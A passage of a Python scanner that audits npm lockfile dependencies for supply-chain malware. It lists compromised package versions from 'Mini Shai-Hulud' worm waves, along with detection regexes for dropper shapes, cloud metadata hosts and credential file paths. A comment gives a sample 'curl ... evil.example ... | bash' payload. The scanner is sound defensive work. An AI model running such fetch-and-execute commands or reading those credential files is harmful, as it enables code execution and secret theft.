    "@uipath/rpa-legacy-tool": {"1.0.1"},
    "@uipath/vertical-solutions-tool": {"1.0.1"},
    "@uipath/flow-tool": {"1.0.2"},
    "@uipath/codedagent-tool": {"1.0.1"},
    "@uipath/common": {"1.0.1"},
    "@uipath/resource-tool": {"1.0.1"},
    "@uipath/auth": {"1.0.1"},
    "@uipath/docsai-tool": {"1.0.1"},
    "@uipath/case-tool": {"1.0.1"},
    "@uipath/api-workflow-tool": {"1.0.1"},
    "@uipath/test-manager-tool": {"1.0.2"},
    "@uipath/robot": {"1.3.4"},
    "@uipath/traces-tool": {"1.0.1"},
    "@uipath/agent-sdk": {"1.0.2"},
    "@uipath/integrationservice-sdk": {"1.0.2"},
    "@uipath/maestro-sdk": {"1.0.1"},
    "@uipath/data-fabric-tool": {"1.0.2"},
    "@uipath/tasks-tool": {"1.0.1"},
    "@uipath/insights-tool": {"1.0.1"},
    "@uipath/insights-sdk": {"1.0.1"},
    "@uipath/uipath-python-bridge": {"1.0.1"},
    "@uipath/ap-chat": {"1.5.7"},
    "@uipath/project-packager": {"1.1.16"},
    "@uipath/packager-tool-case": {"0.0.9"},
    "@uipath/packager-tool-workflowcompiler-browser": {"0.0.34"},
    "@uipath/packager-tool-connector": {"0.0.19"},
    "@uipath/packager-tool-workflowcompiler": {"0.0.16"},
    "@uipath/packager-tool-webapp": {"1.0.6"},
    "@uipath/packager-tool-apiworkflow": {"0.0.19"},
    "@uipath/packager-tool-functions": {"0.1.1"},
    "@uipath/widget.sdk": {"1.2.3"},
    "@uipath/resources-tool": {"0.1.11"},
    "@uipath/agent.sdk": {"0.0.18"},
    "@uipath/codedagents-tool": {"0.1.12"},
    "@uipath/aops-policy-tool": {"0.3.1"},
    "@uipath/solution-packager": {"0.0.35"},
    "@uipath/packager-tool-bpmn": {"0.0.9"},
    "@uipath/packager-tool-flow": {"0.0.19"},
    "@uipath/telemetry": {"0.0.7"},
    "@uipath/tool-workflowcompiler": {"0.0.12"},
    "@uipath/vss": {"0.1.6"},
    "@uipath/solutionpackager-sdk": {"1.0.11"},
    "@uipath/ui-widgets-multi-file-upload": {"1.0.1"},
    "@uipath/access-policy-tool": {"0.3.1"},
    "@uipath/context-grounding-tool": {"0.1.1"},
    "@uipath/gov-tool": {"0.3.1"},
    "@uipath/admin-tool": {"0.1.1"},
    "@uipath/identity-tool": {"0.1.1"},
    "@uipath/llmgw-tool": {"1.0.1"},
    "@uipath/resourcecatalog-tool": {"0.1.1"},
    "@uipath/functions-tool": {"1.0.1"},
    "@uipath/access-policy-sdk": {"0.3.1"},
    "@uipath/platform-tool": {"1.0.1"},
    # Mini Shai-Hulud May-12 wave: @mistralai/* (npm) -- separate from PyPI
    # mistralai (https://www.aikido.dev/blog/mini-shai-hulud-is-back-tanstack-compromised).
    "@mistralai/mistralai": {"2.2.2", "2.2.3", "2.2.4"},
    "@mistralai/mistralai-gcp": {"1.7.1", "1.7.2", "1.7.3"},
    "@mistralai/mistralai-azure": {"1.7.1", "1.7.2", "1.7.3"},
    # Mini Shai-Hulud May-12 wave: @tallyui/* (30 entries, 10 packages)
    # (Aikido enumeration).
    "@tallyui/components": {"1.0.1", "1.0.2", "1.0.3"},
    "@tallyui/connector-medusa": {"1.0.1", "1.0.2", "1.0.3"},
    "@tallyui/connector-shopify": {"1.0.1", "1.0.2", "1.0.3"},
    "@tallyui/connector-vendure": {"1.0.1", "1.0.2", "1.0.3"},
    "@tallyui/connector-woocommerce": {"1.0.1", "1.0.2", "1.0.3"},
    "@tallyui/core": {"0.2.1", "0.2.2", "0.2.3"},
    "@tallyui/database": {"1.0.1", "1.0.2", "1.0.3"},
    "@tallyui/pos": {"0.1.1", "0.1.2", "0.1.3"},
    "@tallyui/storage-sqlite": {"0.2.1", "0.2.2", "0.2.3"},
    "@tallyui/theme": {"0.2.1", "0.2.2", "0.2.3"},
    # Mini Shai-Hulud May-12 wave: @beproduct/nestjs-auth (18 versions)
    # (Aikido enumeration).
    "@beproduct/nestjs-auth": {
        "0.1.2",
        "0.1.3",
        "0.1.4",
        "0.1.5",
        "0.1.6",
        "0.1.7",
        "0.1.8",
        "0.1.9",
        "0.1.10",
        "0.1.11",
        "0.1.12",
        "0.1.13",
        "0.1.14",
        "0.1.15",
        "0.1.16",
        "0.1.17",
        "0.1.18",
        "0.1.19",
    },
    # Mini Shai-Hulud May-12 wave: @draftlab/* + @draftauth/*
    # (Aikido enumeration).
    "@draftauth/client": {"0.2.1", "0.2.2"},
    "@draftauth/core": {"0.13.1", "0.13.2"},
    "@draftlab/auth": {"0.24.1", "0.24.2"},
    "@draftlab/auth-router": {"0.5.1", "0.5.2"},
    "@draftlab/db": {"0.16.1"},
    # Mini Shai-Hulud May-12 wave: @taskflow-corp/cli + @tolka/cli
    # (Aikido enumeration).
    "@taskflow-corp/cli": {"0.1.24", "0.1.25", "0.1.26", "0.1.27", "0.1.28", "0.1.29"},
    "@tolka/cli": {"1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6"},
    # Mini Shai-Hulud May-12 wave: @ml-toolkit-ts/* + @mesadev/* +
    # @dirigible-ai/sdk + @supersurkhet/* (Aikido enumeration).
    "@dirigible-ai/sdk": {"0.6.2", "0.6.3"},
    "@mesadev/rest": {"0.28.3"},
    "@mesadev/saguaro": {"0.4.22"},
    "@mesadev/sdk": {"0.28.3"},
    "@ml-toolkit-ts/preprocessing": {"1.0.2", "1.0.3"},
    "@ml-toolkit-ts/xgboost": {"1.0.3", "1.0.4"},
    "@supersurkhet/cli": {"0.0.2", "0.0.3", "0.0.4", "0.0.5", "0.0.6", "0.0.7"},
    "@supersurkhet/sdk": {"0.0.2", "0.0.3", "0.0.4", "0.0.5", "0.0.6", "0.0.7"},
    # Mini Shai-Hulud May-12 wave: unscoped packages (10 entries)
    # (Aikido enumeration).
    "safe-action": {"0.8.3", "0.8.4"},
    "ts-dna": {"3.0.1", "3.0.2", "3.0.3", "3.0.4"},
    "cross-stitch": {"1.1.3", "1.1.4", "1.1.5", "1.1.6"},
    "cmux-agent-mcp": {"0.1.3", "0.1.4", "0.1.5", "0.1.6", "0.1.7", "0.1.8"},
    "agentwork-cli": {"0.1.4", "0.1.5"},
    "git-branch-selector": {"1.3.3", "1.3.4", "1.3.5", "1.3.6", "1.3.7"},
    "wot-api": {"0.8.1", "0.8.2", "0.8.3", "0.8.4"},
    "git-git-git": {"1.0.8", "1.0.9", "1.0.10", "1.0.11", "1.0.12"},
    "nextmove-mcp": {"0.1.3", "0.1.4", "0.1.5", "0.1.6", "0.1.7"},
    "ml-toolkit-ts": {"1.0.4", "1.0.5"},
    # Cross-ecosystem Mini Shai-Hulud (Apr-30 wave): npm counterpart of
    # PyPI lightning 2.6.2/2.6.3. Same threat actor (TeamPCP) per Semgrep,
    # Aikido, OX Security, Resecurity. Safe version: 7.0.3 and earlier.
    "intercom-client": {"7.0.4"},
}

# Cloud / k8s / CI credential surfaces. A bare substring match here
# false-positives on DEFENSIVE code -- e.g. langchain ships an SSRF
# protection module with a literal blocklist of IMDS IPs. We split
# these into two tiers:
#
#   ALWAYS_BAD: substrings with no legitimate use anywhere in a
#   dependency. A bare match is enough.
#
#   NEEDS_CONTEXT: hosts/paths that DO appear legitimately in
#   defensive code. We only fire when they co-occur with a fetch
#   verb or appear inside an http URL -- that is the structural
#   difference between "blocked address constant" and "exfil
#   target".
#
# The dispatch lives in `scan_text_blob` below.
CRED_HOST_ALWAYS_BAD: tuple[tuple[str, str], ...] = (
    ("registry.npmjs.org/-/npm/v1/tokens", "npm publish-token enumeration endpoint"),
    ("ACTIONS_ID_TOKEN_REQUEST_URL", "GitHub Actions OIDC token-exchange endpoint env"),
    ("ACTIONS_ID_TOKEN_REQUEST_TOKEN", "GitHub Actions OIDC token-exchange token env"),
)

# Hosts that need fetch-verb or URL-scheme context to be malicious.
CRED_HOST_NEEDS_CONTEXT: tuple[tuple[str, str], ...] = (
    ("169.254.169.254", "AWS / GCP / Azure instance metadata service (IMDS)"),
    ("169.254.170.2", "ECS task metadata service"),
    ("metadata.google.internal", "GCE metadata service"),
    ("vault.svc.cluster.local", "in-cluster HashiCorp Vault endpoint"),
    (
        "/var/run/secrets/kubernetes.io/serviceaccount",
        "Kubernetes ServiceAccount token path",
    ),
)

# Credentials a frontend package should NEVER need to read. Bare
# substring match is too noisy (object-treeify ships a `docker` dev
# script that mounts ~/.npmrc -- legitimate dev tooling, never run
# at install time). We instead surface these only when they appear
# inside a LIFECYCLE script (preinstall / install / postinstall /
# prepare), which is the only path that runs automatically on
# `npm ci`. See `scan_package_json` below.
CRED_PATH_SUBSTRINGS: tuple[tuple[str, str], ...] = (
    ("/.npmrc", "npm credentials file"),
    ("/.aws/credentials", "AWS shared credentials file"),
    ("/.ssh/id_rsa", "SSH private key"),
    ("/.ssh/id_ed25519", "SSH private key"),
    ("/.docker/config.json", "Docker registry credentials"),
    ("/.kube/config", "Kubernetes kubeconfig"),
)

# Fetch verbs whose presence near a metadata host upgrades a bare
# substring hit into an actionable finding.
_FETCH_VERBS_PAT = (
    r"(?:fetch|axios|XMLHttpRequest|got\b|undici|"
    r"http\.get|https\.get|http\.request|https\.request|"
    r"new\s+URL|url\.parse|net\.connect|"
    r"\.request\s*\(|\.get\s*\(\s*['\"]\s*https?://)"
)

# JS regex patterns (compile lazily).
_JS_FETCH_EVAL = re.compile(
    r"""(?xs)
    (?:
        Function\s*\(\s*['"`]          # new Function("...")
      | eval\s*\(\s*['"`]
      | \(\s*0\s*,\s*eval\s*\)\s*\(
    )
    .{0,200}
    (?:atob\s*\(|Buffer\s*\.from\s*\([^)]+,\s*['"]base64)
    """,
)

# `process.env.GITHUB_TOKEN` / `NPM_TOKEN` / `AWS_*` access in
# top-level / install-time code is suspicious. We also catch
# `os.environ["GITHUB_TOKEN"]` for the rare Python-in-npm postinstall.
_JS_ENV_TOKEN = re.compile(
    r"""(process\.env\.|os\.environ\[?['"])(?:
        GITHUB_TOKEN | GH_TOKEN | NPM_TOKEN | NODE_AUTH_TOKEN
      | AWS_ACCESS_KEY_ID | AWS_SECRET_ACCESS_KEY | AWS_SESSION_TOKEN
      | GOOGLE_APPLICATION_CREDENTIALS
      | DOCKER_AUTH_CONFIG | VAULT_TOKEN
    )['"]?\]?""",
    re.VERBOSE,
)

# Suspicious lifecycle-script payloads. Anything in a package.json
# `scripts` field that wgets/curls an external resource and executes
# it. We do NOT block ALL curl/wget in scripts (some legit packages
# fetch test fixtures into devDependencies), but we DO block the
# fetch+exec chain.
_LIFECYCLE_FETCH_EXEC = re.compile(
    r"""(?xs)
    (?:curl|wget|fetch|http\.get|axios\.get)\s+       # fetch verb
    .{0,200}
    (?:\|\s*(?:sh|bash|node|python|eval)\b            # pipe to interpreter
      | \&\&\s*(?:sh|bash|node|python|eval)\b         # &&-chain to interpreter
      | -o\s+\S+\s*&&\s*(?:sh|bash|node|python)       # download then run
      | --post-file\s+
      | \$\(.*\)                                      # command-sub of fetched content
    )
    """,
)

# Obfuscation: large JS file that is mostly one line of base64-ish
# blob with a Function() / eval() bookend. Tuned against the
# router_init.js shape (2.3 MB obfuscated single-blob).
_OBFUSC_BLOB = re.compile(
    r"""(?xs)
    (?:Function|eval)\s*\(\s*['"`]?
    [A-Za-z0-9+/=_-]{2048,}            # >=2 KiB of b64-ish
    """,
)
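
# Illustrative payloads these shapes are tuned to catch (synthetic
# examples, not real IOC content):
#   _LIFECYCLE_FETCH_EXEC:  curl -s https://evil.example/x.sh | bash
#   _OBFUSC_BLOB:           eval("QmFzZTY0..." <followed by >=2 KiB of base64>)
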
# ─────────────────────────────────────────────────────────────────────
# Lockfile parsing.
# ─────────────────────────────────────────────────────────────────────
def parse_lockfile(path: Path) -> tuple[list[PackageEntry], list[Finding]]:
    """Return (entries, structural_findings).

    Structural findings here are HIGH-severity refusals that should
    short-circuit the scan -- a lockfile with non-registry resolved
    URLs is itself a finding (covered in detail by
    scripts/lockfile_supply_chain_audit.py; we surface a summary here
    so this scanner is standalone-runnable).
    """
    entries: list[PackageEntry] = []
    findings: list[Finding] = []
    try:
        lock = json.loads(path.read_text(encoding = "utf-8"))
    except (OSError, json.JSONDecodeError) as exc:
        findings.append(
            Finding(
                severity = CRITICAL,
                package = "<root>",
                filename = str(path),
                pattern = "lockfile-unreadable",
                detail = f"could not parse: {exc}",
            )
        )
        return entries, findings
    if lock.get("lockfileVersion") not in (2, 3):
        findings.append(
            Finding(
                severity = HIGH,
                package = "<root>",
                filename = str(path),
                pattern = "unsupported-lockfile-version",
                detail = (
                    f"only lockfileVersion 2 or 3 supported; got "
                    f"{lock.get('lockfileVersion')!r}"
                ),
            )
        )
        return entries, findings
    for key, entry in (lock.get("packages") or {}).items():
        if key == "" or entry.get("link"):
            continue
        # Nested fold-ins (deps inside another package's node_modules/)
        # are covered by the parent tarball's integrity. Skip.
        if key.count("/node_modules/") >= 1:
            continue
        resolved = entry.get("resolved")
        if not resolved:
            continue
        # Strict registry origin check. lockfile_supply_chain_audit
        # already catches this; double-defend here so this scanner
        # cannot be tricked into fetching from an attacker-chosen URL.
        parsed = urllib.parse.urlparse(resolved)
        if parsed.scheme != "https" or parsed.hostname != ALLOWED_DOWNLOAD_HOST:
            findings.append(
                Finding(
                    severity = CRITICAL,
                    package = key,
                    filename = str(path),
                    pattern = "non-registry-resolved-url",
                    detail = (
                        f"resolved={resolved!r}; only "
                        f"https://{ALLOWED_DOWNLOAD_HOST}/ is "
                        "permitted. Refusing to download."
                    ),
                )
            )
            continue
        integrity = entry.get("integrity")
        if not integrity:
            findings.append(
                Finding(
                    severity = HIGH,
                    package = key,
                    filename = str(path),
                    pattern = "missing-integrity-hash",
                    detail = "no `integrity` field; cannot verify download",
                )
            )
            continue
        # node_modules/@scope/name -> @scope/name; node_modules/name -> name
        nm = "node_modules/"
        name = key[len(nm) :] if key.startswith(nm) else key
        version = entry.get("version") or "<unversioned>"
        entries.append(
            PackageEntry(
                name = name,
                version = version,
                resolved = resolved,
                integrity = integrity,
                lockfile_key = key,
            )
        )
    return entries, findings

# ─────────────────────────────────────────────────────────────────────
# Tarball download (registry-only, size-capped, integrity-verified).
# ─────────────────────────────────────────────────────────────────────
def _decode_integrity(integrity: str) -> tuple[str, bytes] | None:
    """Parse SRI integrity 'sha512-<base64>' -> (algo, digest_bytes)."""
    if "-" not in integrity:
        return None
    algo, b64 = integrity.split("-", 1)
    algo = algo.strip().lower()
    if algo not in ("sha256", "sha384", "sha512"):
        return None
    try:
        digest = _b64.b64decode(b64, validate = True)
    except Exception:
        return None
    return algo, digest
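
# Illustrative (digest base64 elided; any SRI string from the lockfile
# has this shape):
#   _decode_integrity("sha512-<b64>") -> ("sha512", <64 raw digest bytes>)
#   _decode_integrity("md5-<b64>")    -> None  (algorithm not allowlisted)
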
def download_tarball(
    entry: PackageEntry,
    dest: Path,
    *,
    timeout: float = HARD_HTTP_TIMEOUT_S,
    max_bytes: int = HARD_MAX_TARBALL_BYTES,
) -> tuple[Path, str | None]:
    """Stream-download entry.resolved to dest. Verify SRI integrity.

    Returns (downloaded_path, error_or_none). On any error the
    returned path may not exist. Network access is restricted to
    https://{ALLOWED_DOWNLOAD_HOST}/ -- the resolved URL was validated
    at parse time and is re-asserted below.
    """
    # Re-assert hostname; the entry was validated at parse time but a
    # defence-in-depth check here means a future refactor cannot
    # accidentally bypass it.
    parsed = urllib.parse.urlparse(entry.resolved)
    if parsed.scheme != "https" or parsed.hostname != ALLOWED_DOWNLOAD_HOST:
        return dest, f"refused download from non-allowlisted URL {entry.resolved!r}"
    decoded = _decode_integrity(entry.integrity or "")
    if decoded is None:
        return dest, f"unparseable integrity field {entry.integrity!r}"
    algo, expected_digest = decoded
    h = hashlib.new(algo)
    req = urllib.request.Request(
        entry.resolved,
        headers = {
            "User-Agent": "unsloth-scan-npm-packages/1.0 (+supply-chain audit)",
            "Accept": "application/octet-stream",
        },
        method = "GET",
    )
    try:
        with urllib.request.urlopen(req, timeout = timeout) as r:
            # Advertised length, if any.
            cl = r.headers.get("Content-Length")
            if cl is not None:
                try:
                    cl_int = int(cl)
                    if cl_int > max_bytes:
                        return dest, f"Content-Length {cl_int} > cap {max_bytes}"
                except ValueError:
                    pass
            written = 0
            with open(dest, "wb") as out:
                while True:
                    chunk = r.read(64 * 1024)
                    if not chunk:
                        break
                    written += len(chunk)
                    if written > max_bytes:
                        return dest, (
                            f"download exceeded cap {max_bytes} bytes "
                            f"after {written} bytes"
                        )
                    h.update(chunk)
                    out.write(chunk)
    except Exception as exc:
        return dest, f"download failed: {exc}"
    actual = h.digest()
    if actual != expected_digest:
        return dest, (
            f"integrity mismatch: expected {algo}={_b64.b64encode(expected_digest).decode()!r}, "
            f"got {algo}={_b64.b64encode(actual).decode()!r}"
        )
    return dest, None

# ─────────────────────────────────────────────────────────────────────
# Safe tar extraction. Every TarFile member is policed before write.
# ─────────────────────────────────────────────────────────────────────
def _is_within(root: Path, candidate: Path) -> bool:
    try:
        return candidate.resolve().is_relative_to(root.resolve())
    except (AttributeError, ValueError):
        # Python <3.9 fallback (we target 3.10+ but be defensive).
        try:
            candidate.resolve().relative_to(root.resolve())
            return True
        except Exception:
            return False
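
# Illustrative (paths need not exist; .resolve() normalises ".."):
#   _is_within(Path("/tmp/x"), Path("/tmp/x/a/b"))    -> True
#   _is_within(Path("/tmp/x"), Path("/tmp/x/../etc")) -> False
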
def safe_extract(
    tarball_path: Path,
    extract_root: Path,
    *,
    max_total_bytes: int = HARD_MAX_TOTAL_BYTES,
    max_members: int = HARD_MAX_MEMBERS,
) -> str | None:
    """Extract tarball_path under extract_root with policed members.

    Returns None on success, or a string describing the refusal.
    Streams via `r|gz` so we can abort mid-extraction without having
    materialised the rest of the archive.
    """
    extract_root.mkdir(parents = True, exist_ok = True)
    total = 0
    count = 0
    try:
        # Open in streaming mode so we never seek backwards in the
        # input. `r|gz` rejects malformed gzip frames immediately.
        with tarfile.open(tarball_path, mode = "r|gz") as tf:
            for member in tf:
                count += 1
                if count > max_members:
                    return f"member count {count} exceeded cap {max_members}"
                name = member.name
                # Reject obvious path-escape.
                if name.startswith("/") or ".." in Path(name).parts:
                    return f"refused unsafe member name {name!r}"
                # Reject device files, FIFOs, sockets, symlinks, hardlinks.
                if member.issym() or member.islnk():
                    return f"refused link member {name!r} (sym/lnk)"
                if member.isdev() or member.isfifo():
                    return f"refused special member {name!r}"
                # Cumulative cap is checked against DECLARED size up
                # front to short-circuit obvious bombs without reading
                # the body.
                declared = max(member.size, 0)
                if declared > HARD_MAX_BINARY_FILE_BYTES:
                    return (
                        f"member {name!r} declared size {declared} > "
                        f"absolute cap {HARD_MAX_BINARY_FILE_BYTES}"
                    )
                if total + declared > max_total_bytes:
                    return (
                        f"cumulative bytes {total + declared} > cap "
                        f"{max_total_bytes} at {name!r}"
                    )
                # npm tarballs prefix members with "package/"; we keep
                # that prefix. We do NOT trust npm to be right, so we
                # explicitly resolve the destination and refuse
                # anything that escapes.
                dest = extract_root / name
                if not _is_within(extract_root, dest):
                    return f"refused escape: {name!r} resolved outside root"
                if member.isdir():
                    dest.mkdir(parents = True, exist_ok = True)
                    continue
                if not member.isfile():
                    # Anything we didn't classify above is unknown.
                    return f"refused unknown member type for {name!r}"
                dest.parent.mkdir(parents = True, exist_ok = True)
                src = tf.extractfile(member)
                if src is None:
                    continue
                # Sniff first 16 bytes to classify text vs binary.
                # Text-cap members get the tight 16 MiB limit; binary
                # members (executables, .node, .wasm, native libs)
                # get the generous binary cap. We bound BOTH cases.
                header = src.read(16)
                is_binary = _looks_binary(name, header)
                file_cap = (
                    HARD_MAX_BINARY_FILE_BYTES
                    if is_binary
                    else HARD_MAX_TEXT_FILE_BYTES
                )
                if declared > file_cap:
                    return (
                        f"member {name!r} declared size {declared} > "
                        f"cap {file_cap} ({'binary' if is_binary else 'text'})"
                    )
                # Read remainder, bounded.
                remainder_cap = file_cap - len(header)
                rest = src.read(remainder_cap + 1)
                data = header + rest
                if len(data) > file_cap:
                    return (
                        f"member {name!r} body exceeded declared size cap "
                        f"({'binary' if is_binary else 'text'})"
                    )
                total += len(data)
                # Write with restrictive mode (rw-r--r--) so even if
                # someone runs the extract dir nothing is executable.
                with open(dest, "wb") as out:
                    out.write(data)
                os.chmod(dest, 0o644)
    except tarfile.TarError as exc:
        return f"tar parse error: {exc}"
    except Exception as exc:
        return f"unexpected extract error: {exc!r}"
    return None

# ─────────────────────────────────────────────────────────────────────
# Content scanning.
# ─────────────────────────────────────────────────────────────────────
def _evidence(text: str, pat: re.Pattern, max_chars: int = 200) -> str:
    m = pat.search(text)
    if not m:
        return ""
    start = max(0, m.start() - 30)
    end = min(len(text), m.end() + 30)
    snippet = text[start:end].replace("\n", " ")
    if len(snippet) > max_chars:
        snippet = snippet[:max_chars] + "..."
    return snippet

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def scan_package_json(
    pkg: PackageEntry,
    rel: str,
    text: str,
) -> list[Finding]:
    findings: list[Finding] = []
    try:
        meta = json.loads(text)
    except Exception:
        return findings
    if not isinstance(meta, dict):
        return findings
    scripts = meta.get("scripts") or {}
    if not isinstance(scripts, dict):
        return findings
    for hook in LIFECYCLE_HOOKS:
        body = scripts.get(hook)
        if not isinstance(body, str):
            continue
        if _LIFECYCLE_FETCH_EXEC.search(body):
            findings.append(
                Finding(
                    severity = CRITICAL,
                    package = pkg.display,
                    filename = rel,
                    pattern = f"lifecycle-fetch-exec ({hook})",
                    evidence = body,
                    detail = (
                        f"`scripts.{hook}` fetches an external "
                        "resource and pipes/chains it to an "
                        "interpreter; this is the install-time RCE "
                        "vector. Refusing to install."
                    ),
                )
            )
        # Credential file paths inside a lifecycle script are
        # exfiltration prep -- npm runs these scripts automatically
        # on `npm ci`. Manual `scripts.*` entries (like a `docker`
        # dev script) are out of scope: npm does not run them.
        for path_substr, why in CRED_PATH_SUBSTRINGS:
            if path_substr in body:
                findings.append(
                    Finding(
                        severity = HIGH,
                        package = pkg.display,
                        filename = rel,
                        pattern = f"cred-path-in-lifecycle ({hook})",
                        evidence = body,
                        detail = (
                            f"`scripts.{hook}` references {why} "
                            f"({path_substr!r}); install-time access "
                            "to local credential files is the "
                            "exfiltration prep step"
                        ),
                    )
                )
        if _JS_ENV_TOKEN.search(body):
            findings.append(
                Finding(
                    severity = HIGH,
                    package = pkg.display,
                    filename = rel,
                    pattern = f"cred-env-in-lifecycle ({hook})",
                    evidence = _evidence(body, _JS_ENV_TOKEN),
                    detail = (
                        f"`scripts.{hook}` references a credential "
                        "env var (GITHUB_TOKEN / NPM_TOKEN / AWS_* "
                        "/ etc); install-time access to runner "
                        "secrets is the exfiltration prep step"
                    ),
                )
            )
    # Optional deps pointing at github: are the TanStack-style
    # injection vector.
    opt = meta.get("optionalDependencies") or {}
    if isinstance(opt, dict):
        for k, v in opt.items():
            if isinstance(v, str) and (
                v.startswith("github:")
                or v.startswith("git+")
                or v.startswith("git://")
            ):
                findings.append(
                    Finding(
                        severity = HIGH,
                        package = pkg.display,
                        filename = rel,
                        pattern = "optional-dep-non-registry",
                        evidence = f"{k}={v}",
                        detail = (
                            "package.json `optionalDependencies` "
                            "points at a non-registry source; this "
                            "is the Shai-Hulud worm injection shape."
                        ),
                    )
                )
    return findings

def _host_in_outbound_context(text: str, host: str) -> bool:
    """True if `host` appears in a way consistent with an outbound call.

    A bare `"169.254.169.254"` array literal (defensive blocklist) is
    safe; a `fetch("http://169.254.169.254/...")` is not. The signal
    is co-occurrence with either an HTTP URL scheme or a fetch verb
    within a short window.

    A defensive blocklist looks like:
        const CLOUD_METADATA_IPS = ["169.254.169.254", "169.254.170.2"];
    An exfil call looks like:
        fetch("http://169.254.169.254/latest/meta-data/...")
        http.request({ host: "169.254.169.254", path: "/..." })
    """
    # Escape for use in a regex (IPs contain dots).
    host_re = re.escape(host)
    # 1. URL form: http://host or https://host or //host/ or //host"
    url_form = re.compile(
        rf"(?:https?:)?//{host_re}(?:[:/\"'?#]|$)",
    )
    if url_form.search(text):
        return True
    # 2. Host appears within 200 chars of a fetch verb (either side).
    fetch_context = re.compile(
        rf"(?:{_FETCH_VERBS_PAT})[^\n]{{0,200}}{host_re}"
        rf"|{host_re}[^\n]{{0,200}}(?:{_FETCH_VERBS_PAT})",
        re.IGNORECASE,
    )
    if fetch_context.search(text):
        return True
    # 3. `host:` / `hostname:` config field referencing the IP.
    cfg_form = re.compile(
        rf"(?:host|hostname)\s*:\s*['\"`]{host_re}['\"`]",
        re.IGNORECASE,
    )
    if cfg_form.search(text):
        return True
    return False

def scan_text_blob(
    pkg: PackageEntry,
    rel: str,
    text: str,
) -> list[Finding]:
    findings: list[Finding] = []
    # IOC substrings (literal, case-sensitive).
    for needle, (sev, why) in KNOWN_IOC_STRINGS.items():
        if needle in text:
            findings.append(
                Finding(
                    severity = sev,
                    package = pkg.display,
                    filename = rel,
                    pattern = "known-ioc-string",
                    evidence = needle,
                    detail = f"{why}: {needle!r}",
                )
            )
    # Credential surfaces. Tier 1: hosts with no legitimate use,
    # bare substring is enough.
    for needle, why in CRED_HOST_ALWAYS_BAD:
        if needle in text:
            findings.append(
                Finding(
                    severity = HIGH,
                    package = pkg.display,
                    filename = rel,
                    pattern = "cred-surface-host (always-bad)",
                    evidence = needle,
                    detail = (
                        f"references {why} ({needle!r}); no legitimate "
                        "frontend use of this surface"
                    ),
                )
            )
    # Credential surfaces. Tier 2: hosts that do appear in defensive
    # code; require co-occurrence with a fetch verb or URL prefix.
    for needle, why in CRED_HOST_NEEDS_CONTEXT:
        if needle in text and _host_in_outbound_context(text, needle):
            findings.append(
                Finding(
                    severity = HIGH,
                    package = pkg.display,
                    filename = rel,
                    pattern = "cred-surface-host (outbound)",
                    evidence = needle,
                    detail = (
                        f"references {why} ({needle!r}) in an outbound "
                        "call / URL / host config; a defensive blocklist "
                        "literal would not match this rule"
                    ),
                )
            )
    # Credential PATHS are deliberately not scanned here; they have
    # too high a false-positive rate at file scope (defensive code,
    # docker mounts, AWS SDK docs strings). `scan_package_json`
    # catches the malicious case -- credential paths inside a
    # lifecycle script run automatically on `npm ci`.
    # JS-specific regex.
    if _JS_FETCH_EVAL.search(text):
        findings.append(
            Finding(
                severity = HIGH,
                package = pkg.display,
                filename = rel,
                pattern = "js-fetch-eval",
                evidence = _evidence(text, _JS_FETCH_EVAL),
                detail = (
                    "Function/eval against base64-decoded payload "
                    "(obfuscated dropper shape)"
                ),
            )
        )
    if _JS_ENV_TOKEN.search(text):
        findings.append(
            Finding(
                severity = MEDIUM,
                package = pkg.display,
                filename = rel,
                pattern = "js-env-token",
                evidence = _evidence(text, _JS_ENV_TOKEN),
                detail = "references credential env vars in package source",
            )
        )
    if _OBFUSC_BLOB.search(text):
        findings.append(
            Finding(
                severity = HIGH,
                package = pkg.display,
                filename = rel,
                pattern = "obfuscated-blob",
                evidence = _evidence(text, _OBFUSC_BLOB),
                detail = (
                    "large base64-ish blob fed to Function/eval; "
                    "matches the TanStack worm dropper shape"
                ),
            )
        )
    return findings

# Filename suffix decides which scanners run. We deliberately treat
# *.cjs/*.mjs/*.ts the same as *.js -- attackers use whichever
# extension the consumer's bundler / loader resolves.
_TEXT_SUFFIXES = (
    ".js",
    ".mjs",
    ".cjs",
    ".ts",
    ".tsx",
    ".json",
    ".html",
    ".htm",
    ".sh",
    ".bash",
    ".zsh",
    ".py",
    ".rb",
    ".yml",
    ".yaml",
)

def scan_extracted_tree(
    pkg: PackageEntry,
    root: Path,
) -> list[Finding]:
    findings: list[Finding] = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        lower = rel.lower()
        if not lower.endswith(_TEXT_SUFFIXES):
            # Skip native binaries entirely -- regex over compiled
            # machine code is just noise (false positives in WASM
            # opcodes, .node BSS segments, image pixel data). Use
            # content-magic detection so extensionless executables
            # (eg `package/biome`) and versioned shared libraries
            # are also skipped.
            try:
                if path.stat().st_size > HARD_MAX_TEXT_FILE_BYTES:
                    continue
                with open(path, "rb") as fh:
                    header = fh.read(16)
                if _looks_binary(rel, header):
                    continue
                data = header + path.read_bytes()[len(header) :]
            except OSError:
                continue
            text = data.decode("utf-8", errors = "replace")
            for needle, (sev, why) in KNOWN_IOC_STRINGS.items():
                if needle in text:
                    findings.append(
                        Finding(
                            severity = sev,
                            package = pkg.display,
                            filename = rel,
                            pattern = "known-ioc-string",
                            evidence = needle,
                            detail = f"{why}: {needle!r}",
                        )
                    )
            continue
        try:
            data = path.read_bytes()
        except OSError:
            continue
        text = data.decode("utf-8", errors = "replace")
        if rel.endswith("package.json"):
            findings.extend(scan_package_json(pkg, rel, text))
        findings.extend(scan_text_blob(pkg, rel, text))
    return findings

# ─────────────────────────────────────────────────────────────────────
# Orchestrator.
# ─────────────────────────────────────────────────────────────────────
def scan_one(
    pkg: PackageEntry,
    workspace: Path,
) -> tuple[list[Finding], str | None]:
    """Download + extract + scan a single package. Cleans up its dir.

    Returns (findings, error). `error` is non-None only on hard
    failures (download error, integrity mismatch, malformed tarball);
    on a clean run with findings the error is None and the caller
    decides exit code based on severity.
    """
    pkg_dir = workspace / f"{pkg.name.replace('/', '_')}-{pkg.version}"
    pkg_dir.mkdir(parents = True, exist_ok = True)
    tarball = pkg_dir / "pkg.tgz"
    extract = pkg_dir / "x"
    try:
        _, err = download_tarball(pkg, tarball)
        if err:
            return [], err
        err = safe_extract(tarball, extract)
        if err:
            return [], err
        return scan_extracted_tree(pkg, extract), None
    finally:
        # Always wipe per-package data to keep the workspace bounded;
        # ignore_errors already swallows cleanup failures.
        shutil.rmtree(pkg_dir, ignore_errors = True)

def main(argv: list[str] | None = None) -> int:
    parser = argparse.ArgumentParser(
